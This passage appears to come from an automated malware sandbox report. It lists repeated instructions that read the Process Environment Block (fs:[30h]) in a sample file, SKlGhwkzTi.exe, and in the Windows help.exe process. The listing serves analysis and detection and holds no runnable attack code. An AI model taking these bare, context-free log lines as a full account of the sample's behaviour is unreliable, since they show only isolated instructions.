          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A37F5 mov eax, dword ptr fs:[00000030h]4_2_018A37F5
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189A70E mov eax, dword ptr fs:[00000030h]4_2_0189A70E
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189A70E mov eax, dword ptr fs:[00000030h]4_2_0189A70E
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0193070D mov eax, dword ptr fs:[00000030h]4_2_0193070D
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0193070D mov eax, dword ptr fs:[00000030h]4_2_0193070D
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0188F716 mov eax, dword ptr fs:[00000030h]4_2_0188F716
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018FFF10 mov eax, dword ptr fs:[00000030h]4_2_018FFF10
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018FFF10 mov eax, dword ptr fs:[00000030h]4_2_018FFF10
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01864F2E mov eax, dword ptr fs:[00000030h]4_2_01864F2E
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01864F2E mov eax, dword ptr fs:[00000030h]4_2_01864F2E
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189E730 mov eax, dword ptr fs:[00000030h]4_2_0189E730
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0187EF40 mov eax, dword ptr fs:[00000030h]4_2_0187EF40
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0187FF60 mov eax, dword ptr fs:[00000030h]4_2_0187FF60
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01938F6A mov eax, dword ptr fs:[00000030h]4_2_01938F6A
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018FFE87 mov eax, dword ptr fs:[00000030h]4_2_018FFE87
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E46A7 mov eax, dword ptr fs:[00000030h]4_2_018E46A7
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01930EA5 mov eax, dword ptr fs:[00000030h]4_2_01930EA5
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01930EA5 mov eax, dword ptr fs:[00000030h]4_2_01930EA5
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01930EA5 mov eax, dword ptr fs:[00000030h]4_2_01930EA5
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01938ED6 mov eax, dword ptr fs:[00000030h]4_2_01938ED6
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018936CC mov eax, dword ptr fs:[00000030h]4_2_018936CC
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A8EC7 mov eax, dword ptr fs:[00000030h]4_2_018A8EC7
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0191FEC0 mov eax, dword ptr fs:[00000030h]4_2_0191FEC0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018776E2 mov eax, dword ptr fs:[00000030h]4_2_018776E2
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018916E0 mov ecx, dword ptr fs:[00000030h]4_2_018916E0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0186C600 mov eax, dword ptr fs:[00000030h]4_2_0186C600
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0186C600 mov eax, dword ptr fs:[00000030h]4_2_0186C600
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0186C600 mov eax, dword ptr fs:[00000030h]4_2_0186C600
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01898E00 mov eax, dword ptr fs:[00000030h]4_2_01898E00
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189A61C mov eax, dword ptr fs:[00000030h]4_2_0189A61C
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189A61C mov eax, dword ptr fs:[00000030h]4_2_0189A61C
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01921608 mov eax, dword ptr fs:[00000030h]4_2_01921608
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0186E620 mov eax, dword ptr fs:[00000030h]4_2_0186E620
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0191FE3F mov eax, dword ptr fs:[00000030h]4_2_0191FE3F
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01877E41 mov eax, dword ptr fs:[00000030h]4_2_01877E41
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01877E41 mov eax, dword ptr fs:[00000030h]4_2_01877E41
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01877E41 mov eax, dword ptr fs:[00000030h]4_2_01877E41
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01877E41 mov eax, dword ptr fs:[00000030h]4_2_01877E41
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01877E41 mov eax, dword ptr fs:[00000030h]4_2_01877E41
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01877E41 mov eax, dword ptr fs:[00000030h]4_2_01877E41
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0192AE44 mov eax, dword ptr fs:[00000030h]4_2_0192AE44
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0192AE44 mov eax, dword ptr fs:[00000030h]4_2_0192AE44
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0187766D mov eax, dword ptr fs:[00000030h]4_2_0187766D
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0188AE73 mov eax, dword ptr fs:[00000030h]4_2_0188AE73
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0188AE73 mov eax, dword ptr fs:[00000030h]4_2_0188AE73
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0188AE73 mov eax, dword ptr fs:[00000030h]4_2_0188AE73
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0188AE73 mov eax, dword ptr fs:[00000030h]4_2_0188AE73
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0188AE73 mov eax, dword ptr fs:[00000030h]4_2_0188AE73
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F2397 mov eax, dword ptr fs:[00000030h]13_2_039F2397
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A95BA5 mov eax, dword ptr fs:[00000030h]13_2_03A95BA5
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039FB390 mov eax, dword ptr fs:[00000030h]13_2_039FB390
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D1B8F mov eax, dword ptr fs:[00000030h]13_2_039D1B8F
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D1B8F mov eax, dword ptr fs:[00000030h]13_2_039D1B8F
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A8138A mov eax, dword ptr fs:[00000030h]13_2_03A8138A
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A7D380 mov ecx, dword ptr fs:[00000030h]13_2_03A7D380
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F4BAD mov eax, dword ptr fs:[00000030h]13_2_039F4BAD
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F4BAD mov eax, dword ptr fs:[00000030h]13_2_039F4BAD
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F4BAD mov eax, dword ptr fs:[00000030h]13_2_039F4BAD
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A453CA mov eax, dword ptr fs:[00000030h]13_2_03A453CA
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A453CA mov eax, dword ptr fs:[00000030h]13_2_03A453CA
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039EDBE9 mov eax, dword ptr fs:[00000030h]13_2_039EDBE9
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F03E2 mov eax, dword ptr fs:[00000030h]13_2_039F03E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F03E2 mov eax, dword ptr fs:[00000030h]13_2_039F03E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F03E2 mov eax, dword ptr fs:[00000030h]13_2_039F03E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F03E2 mov eax, dword ptr fs:[00000030h]13_2_039F03E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F03E2 mov eax, dword ptr fs:[00000030h]13_2_039F03E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F03E2 mov eax, dword ptr fs:[00000030h]13_2_039F03E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A8131B mov eax, dword ptr fs:[00000030h]13_2_03A8131B
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039CF358 mov eax, dword ptr fs:[00000030h]13_2_039CF358
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039CDB40 mov eax, dword ptr fs:[00000030h]13_2_039CDB40
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F3B7A mov eax, dword ptr fs:[00000030h]13_2_039F3B7A
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F3B7A mov eax, dword ptr fs:[00000030h]13_2_039F3B7A
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A98B58 mov eax, dword ptr fs:[00000030h]13_2_03A98B58
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039CDB60 mov ecx, dword ptr fs:[00000030h]13_2_039CDB60
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039FD294 mov eax, dword ptr fs:[00000030h]13_2_039FD294
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039FD294 mov eax, dword ptr fs:[00000030h]13_2_039FD294
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039DAAB0 mov eax, dword ptr fs:[00000030h]13_2_039DAAB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039DAAB0 mov eax, dword ptr fs:[00000030h]13_2_039DAAB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039FFAB0 mov eax, dword ptr fs:[00000030h]13_2_039FFAB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C52A5 mov eax, dword ptr fs:[00000030h]13_2_039C52A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C52A5 mov eax, dword ptr fs:[00000030h]13_2_039C52A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C52A5 mov eax, dword ptr fs:[00000030h]13_2_039C52A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C52A5 mov eax, dword ptr fs:[00000030h]13_2_039C52A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C52A5 mov eax, dword ptr fs:[00000030h]13_2_039C52A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F2ACB mov eax, dword ptr fs:[00000030h]13_2_039F2ACB
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F2AE4 mov eax, dword ptr fs:[00000030h]13_2_039F2AE4
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039E3A1C mov eax, dword ptr fs:[00000030h]13_2_039E3A1C
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039CAA16 mov eax, dword ptr fs:[00000030h]13_2_039CAA16
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039CAA16 mov eax, dword ptr fs:[00000030h]13_2_039CAA16
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A04A2C mov eax, dword ptr fs:[00000030h]13_2_03A04A2C
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A04A2C mov eax, dword ptr fs:[00000030h]13_2_03A04A2C
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C5210 mov eax, dword ptr fs:[00000030h]13_2_039C5210
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C5210 mov ecx, dword ptr fs:[00000030h]13_2_039C5210
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C5210 mov eax, dword ptr fs:[00000030h]13_2_039C5210
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C5210 mov eax, dword ptr fs:[00000030h]13_2_039C5210
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D8A0A mov eax, dword ptr fs:[00000030h]13_2_039D8A0A
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A8AA16 mov eax, dword ptr fs:[00000030h]13_2_03A8AA16
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A8AA16 mov eax, dword ptr fs:[00000030h]13_2_03A8AA16
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A7B260 mov eax, dword ptr fs:[00000030h]13_2_03A7B260
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A7B260 mov eax, dword ptr fs:[00000030h]13_2_03A7B260
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A98A62 mov eax, dword ptr fs:[00000030h]13_2_03A98A62
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A0927A mov eax, dword ptr fs:[00000030h]13_2_03A0927A
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C9240 mov eax, dword ptr fs:[00000030h]13_2_039C9240
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C9240 mov eax, dword ptr fs:[00000030h]13_2_039C9240
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C9240 mov eax, dword ptr fs:[00000030h]13_2_039C9240
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C9240 mov eax, dword ptr fs:[00000030h]13_2_039C9240
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A54257 mov eax, dword ptr fs:[00000030h]13_2_03A54257
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A8EA55 mov eax, dword ptr fs:[00000030h]13_2_03A8EA55
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A469A6 mov eax, dword ptr fs:[00000030h]13_2_03A469A6
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F2990 mov eax, dword ptr fs:[00000030h]13_2_039F2990
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039FA185 mov eax, dword ptr fs:[00000030h]13_2_039FA185
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A451BE mov eax, dword ptr fs:[00000030h]13_2_03A451BE
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A451BE mov eax, dword ptr fs:[00000030h]13_2_03A451BE
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A451BE mov eax, dword ptr fs:[00000030h]13_2_03A451BE
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A451BE mov eax, dword ptr fs:[00000030h]13_2_03A451BE
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039EC182 mov eax, dword ptr fs:[00000030h]13_2_039EC182
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F61A0 mov eax, dword ptr fs:[00000030h]13_2_039F61A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F61A0 mov eax, dword ptr fs:[00000030h]13_2_039F61A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A541E8 mov eax, dword ptr fs:[00000030h]13_2_03A541E8
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039CB1E1 mov eax, dword ptr fs:[00000030h]13_2_039CB1E1
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039CB1E1 mov eax, dword ptr fs:[00000030h]13_2_039CB1E1
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039CB1E1 mov eax, dword ptr fs:[00000030h]13_2_039CB1E1
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C9100 mov eax, dword ptr fs:[00000030h]13_2_039C9100
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C9100 mov eax, dword ptr fs:[00000030h]13_2_039C9100
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C9100 mov eax, dword ptr fs:[00000030h]13_2_039C9100
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F513A mov eax, dword ptr fs:[00000030h]13_2_039F513A
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F513A mov eax, dword ptr fs:[00000030h]13_2_039F513A
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039E4120 mov eax, dword ptr fs:[00000030h]13_2_039E4120
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039E4120 mov eax, dword ptr fs:[00000030h]13_2_039E4120
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039E4120 mov eax, dword ptr fs:[00000030h]13_2_039E4120
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039E4120 mov eax, dword ptr fs:[00000030h]13_2_039E4120
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039E4120 mov ecx, dword ptr fs:[00000030h]13_2_039E4120
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039EB944 mov eax, dword ptr fs:[00000030h]13_2_039EB944
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039EB944 mov eax, dword ptr fs:[00000030h]13_2_039EB944
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039CB171 mov eax, dword ptr fs:[00000030h]13_2_039CB171
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039CB171 mov eax, dword ptr fs:[00000030h]13_2_039CB171
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039CC962 mov eax, dword ptr fs:[00000030h]13_2_039CC962
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A090AF mov eax, dword ptr fs:[00000030h]13_2_03A090AF
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C9080 mov eax, dword ptr fs:[00000030h]13_2_039C9080
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039FF0BF mov ecx, dword ptr fs:[00000030h]13_2_039FF0BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039FF0BF mov eax, dword ptr fs:[00000030h]13_2_039FF0BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039FF0BF mov eax, dword ptr fs:[00000030h]13_2_039FF0BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A43884 mov eax, dword ptr fs:[00000030h]13_2_03A43884
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A43884 mov eax, dword ptr fs:[00000030h]13_2_03A43884
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F20A0 mov eax, dword ptr fs:[00000030h]13_2_039F20A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F20A0 mov eax, dword ptr fs:[00000030h]13_2_039F20A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F20A0 mov eax, dword ptr fs:[00000030h]13_2_039F20A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F20A0 mov eax, dword ptr fs:[00000030h]13_2_039F20A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F20A0 mov eax, dword ptr fs:[00000030h]13_2_039F20A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F20A0 mov eax, dword ptr fs:[00000030h]13_2_039F20A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C58EC mov eax, dword ptr fs:[00000030h]13_2_039C58EC
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A5B8D0 mov eax, dword ptr fs:[00000030h]13_2_03A5B8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A5B8D0 mov ecx, dword ptr fs:[00000030h]13_2_03A5B8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A5B8D0 mov eax, dword ptr fs:[00000030h]13_2_03A5B8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A5B8D0 mov eax, dword ptr fs:[00000030h]13_2_03A5B8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A5B8D0 mov eax, dword ptr fs:[00000030h]13_2_03A5B8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A5B8D0 mov eax, dword ptr fs:[00000030h]13_2_03A5B8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A47016 mov eax, dword ptr fs:[00000030h]13_2_03A47016
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A47016 mov eax, dword ptr fs:[00000030h]13_2_03A47016
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A47016 mov eax, dword ptr fs:[00000030h]13_2_03A47016
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F002D mov eax, dword ptr fs:[00000030h]13_2_039F002D
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F002D mov eax, dword ptr fs:[00000030h]13_2_039F002D
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F002D mov eax, dword ptr fs:[00000030h]13_2_039F002D
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F002D mov eax, dword ptr fs:[00000030h]13_2_039F002D
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F002D mov eax, dword ptr fs:[00000030h]13_2_039F002D
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039DB02A mov eax, dword ptr fs:[00000030h]13_2_039DB02A
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039DB02A mov eax, dword ptr fs:[00000030h]13_2_039DB02A
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039DB02A mov eax, dword ptr fs:[00000030h]13_2_039DB02A
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039DB02A mov eax, dword ptr fs:[00000030h]13_2_039DB02A
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A94015 mov eax, dword ptr fs:[00000030h]13_2_03A94015
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A94015 mov eax, dword ptr fs:[00000030h]13_2_03A94015
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039E0050 mov eax, dword ptr fs:[00000030h]13_2_039E0050
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039E0050 mov eax, dword ptr fs:[00000030h]13_2_039E0050
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A82073 mov eax, dword ptr fs:[00000030h]13_2_03A82073
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A91074 mov eax, dword ptr fs:[00000030h]13_2_03A91074
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D8794 mov eax, dword ptr fs:[00000030h]13_2_039D8794
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A47794 mov eax, dword ptr fs:[00000030h]13_2_03A47794
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A47794 mov eax, dword ptr fs:[00000030h]13_2_03A47794
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A47794 mov eax, dword ptr fs:[00000030h]13_2_03A47794
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A037F5 mov eax, dword ptr fs:[00000030h]13_2_03A037F5
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039EF716 mov eax, dword ptr fs:[00000030h]13_2_039EF716
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039FA70E mov eax, dword ptr fs:[00000030h]13_2_039FA70E
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039FA70E mov eax, dword ptr fs:[00000030h]13_2_039FA70E
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A9070D mov eax, dword ptr fs:[00000030h]13_2_03A9070D
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A9070D mov eax, dword ptr fs:[00000030h]13_2_03A9070D
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039FE730 mov eax, dword ptr fs:[00000030h]13_2_039FE730
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C4F2E mov eax, dword ptr fs:[00000030h]13_2_039C4F2E
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C4F2E mov eax, dword ptr fs:[00000030h]13_2_039C4F2E
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A5FF10 mov eax, dword ptr fs:[00000030h]13_2_03A5FF10
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A5FF10 mov eax, dword ptr fs:[00000030h]13_2_03A5FF10
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A98F6A mov eax, dword ptr fs:[00000030h]13_2_03A98F6A
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039DEF40 mov eax, dword ptr fs:[00000030h]13_2_039DEF40
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039DFF60 mov eax, dword ptr fs:[00000030h]13_2_039DFF60
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A446A7 mov eax, dword ptr fs:[00000030h]13_2_03A446A7
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A90EA5 mov eax, dword ptr fs:[00000030h]13_2_03A90EA5
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A90EA5 mov eax, dword ptr fs:[00000030h]13_2_03A90EA5
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A90EA5 mov eax, dword ptr fs:[00000030h]13_2_03A90EA5
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A5FE87 mov eax, dword ptr fs:[00000030h]13_2_03A5FE87
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F36CC mov eax, dword ptr fs:[00000030h]13_2_039F36CC
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A7FEC0 mov eax, dword ptr fs:[00000030h]13_2_03A7FEC0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A08EC7 mov eax, dword ptr fs:[00000030h]13_2_03A08EC7
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D76E2 mov eax, dword ptr fs:[00000030h]13_2_039D76E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A98ED6 mov eax, dword ptr fs:[00000030h]13_2_03A98ED6
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F16E0 mov ecx, dword ptr fs:[00000030h]13_2_039F16E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039FA61C mov eax, dword ptr fs:[00000030h]13_2_039FA61C
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039FA61C mov eax, dword ptr fs:[00000030h]13_2_039FA61C
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A7FE3F mov eax, dword ptr fs:[00000030h]13_2_03A7FE3F
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039CC600 mov eax, dword ptr fs:[00000030h]13_2_039CC600
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039CC600 mov eax, dword ptr fs:[00000030h]13_2_039CC600
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039CC600 mov eax, dword ptr fs:[00000030h]13_2_039CC600
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F8E00 mov eax, dword ptr fs:[00000030h]13_2_039F8E00
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A81608 mov eax, dword ptr fs:[00000030h]13_2_03A81608
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039CE620 mov eax, dword ptr fs:[00000030h]13_2_039CE620
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D7E41 mov eax, dword ptr fs:[00000030h]13_2_039D7E41
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D7E41 mov eax, dword ptr fs:[00000030h]13_2_039D7E41
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D7E41 mov eax, dword ptr fs:[00000030h]13_2_039D7E41
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D7E41 mov eax, dword ptr fs:[00000030h]13_2_039D7E41
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D7E41 mov eax, dword ptr fs:[00000030h]13_2_039D7E41
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D7E41 mov eax, dword ptr fs:[00000030h]13_2_039D7E41
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A8AE44 mov eax, dword ptr fs:[00000030h]13_2_03A8AE44
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A8AE44 mov eax, dword ptr fs:[00000030h]13_2_03A8AE44
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039EAE73 mov eax, dword ptr fs:[00000030h]13_2_039EAE73
